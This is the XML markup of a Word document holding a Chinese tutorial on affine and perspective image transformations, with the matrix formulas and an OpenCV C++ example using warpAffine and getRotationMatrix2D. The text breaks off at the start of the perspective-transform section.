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5B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各种知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD4D24" w:rsidRDefault="00553530" w:rsidP="00AD4D24">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仿射变换和透视</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00AD4D24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>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sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>序言</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在图像处理中，对图像进行二维变换有仿射变换（Affine Transformation），透视变换（Perspective Transformation）（应该还有其他变换，但是我用到的比较多的是这两种变换）。</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rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>仿射变换</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FF0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1、概念</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仿射变换（Affine Transformation）是空间直角坐标系的变换，从一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF6666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>二维坐标变换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>到另一个二维坐标，仿射变换是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF6666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>线性变换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，他保持了图像的“平行性”和“平直性”，即图像中原来的直线和平行线，变换后仍然保持原来的直线和平行线，仿射变换比较常用的特殊变换有平移(Translation)、缩放（Scale）、翻转（Flip）、旋转（Rotation）和剪切(Shear)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2857500" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="466" name="图片 466" descr="http://img.blog.csdn.net/2014042817195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g.blog.csdn.net/201404281719540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1276350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>图1.仿射变换</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2、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>仿射变换的变换公式推导</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lastRenderedPageBreak/>
        <w:t>        在opencv提供的仿射变换中，变换的公式是一个2*3的矩阵，如下：</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noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3933825" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="465" name="图片 465" descr="http://img.blog.csdn.net/2014042817350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blog.csdn.net/2014042817350460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33825" cy="971550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2200275" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="464" name="图片 464" descr="http://img.blog.csdn.net/2014042817352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blog.csdn.net/2014042817352043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00275" cy="1000125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1371600" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17" name="图片 17" descr="http://img.blog.csdn.net/2014042817353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blog.csdn.net/2014042817353118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71600" cy="1000125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>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A是仿射变换2*3矩阵，M是2*2矩阵，表示坐标轴的旋转和缩放，B是2*1矩阵，是坐标轴平移矩阵。</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坐标变换如下：</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noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3124200" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="图片 16" descr="http://img.blog.csdn.net/2014042817370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img.blog.csdn.net/201404281737038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24200" cy="990600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4076700" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="图片 15" descr="http://img.blog.csdn.net/2014042817371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blog.csdn.net/2014042817371639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76700" cy="1419225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>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可以看出，A矩阵只有6个参数，所以只要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF6666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>知道3个点之间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>的仿射变换，就可以求出A矩阵。</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FF0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>   3、 仿射变换坐标系法推导</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仿射变换也可以看成坐标系的旋转和缩放以及平移：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3810000" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="http://img.blog.csdn.net/2014042817461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img.blog.csdn.net/2014042817461245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10000" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>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P点位置不变，坐标系由（Xt，Yt）变换到（Xs，Ys），相应的坐标有（Xtp，Ytp）变换成（Xsp，Ysp）。</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其中（Xtp，Ytp）与（Xsp，Ysp）的关系如下：</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5276850" cy="904875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13" name="图片 13" descr="http://img.blog.csdn.net/2014050510455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g.blog.csdn.net/2014050510455114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6850" cy="904875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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br/>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4、opencv仿射变换程序实现</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lastRenderedPageBreak/>
        <w:t>#include &lt;opencv2/core/core.hpp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;opencv2/imgproc/imgproc.hpp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;opencv2/highgui/highgui.hpp&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>#include &lt;vector&gt;</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using namespace std;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>using namespace cv;</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void main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::Mat image = cv::imread("image.jpg");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::namedWindow("source image");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::imshow("source image",image);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> //3点的仿射变换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::Point2f src_point[3];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::Point2f dst_point[3];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> src_point[0] = cv::Point2f(0,0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> src_point[1] = cv::Point2f(image.cols-1,0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> src_point[2] = cv::Point2f(0,image.rows-1);</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dst_point[0] = cv::Point2f(image.cols*0.1,image.rows*0.13);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> dst_point[1] = cv::Point2f(image.cols*0.8,image.rows*0.32);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> dst_point[2] = cv::Point2f(image.cols*0.16,image.rows*0.7);</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cv::Mat warp_mat(cv::Size(2,3),CV_32F);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> warp_mat = cv::getAffineTransform(src_point,dst_point);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> cv::Mat warpimage= cv::Mat::zeros(image.rows,image.cols,image.type());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::warpAffine(image,warpimage,warp_mat,warpimage.size());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::namedWindow("dst image");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::imshow("dst image",warpimage);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::imwrite("warpimage1.jpg",warpimage);</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对图像旋转后缩放的仿射变换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::Point2f center = Point2f(image.cols/2,image.rows/2);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> double angle = 30;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> double scale = 0.8;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> warp_mat = getRotationMatrix2D(center,angle,scale);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::warpAffine(image,warpimage,warp_mat,warpimage.size());</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cv::namedWindow("dst image2");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::imshow("dst image2",warpimage);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::imwrite("warpimage2.jpg",warpimage);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t> cv::waitKey(0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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FF0000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>二、透视变换</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 透视变换（Perspective Transformation)是指利用透视中心、像点、目标点三点共线的条件，按透视旋转定律使承影面（透视面）绕迹线（透</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>视轴）旋转某一角度，破坏原有的投影光线束，仍能保持承影面上投影几何图形不变的变换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00333D38" w:rsidRDefault="00333D38" w:rsidP="00333D38">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:noProof/>
          <w:color w:val="454545"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2962275" cy="1971675"/>
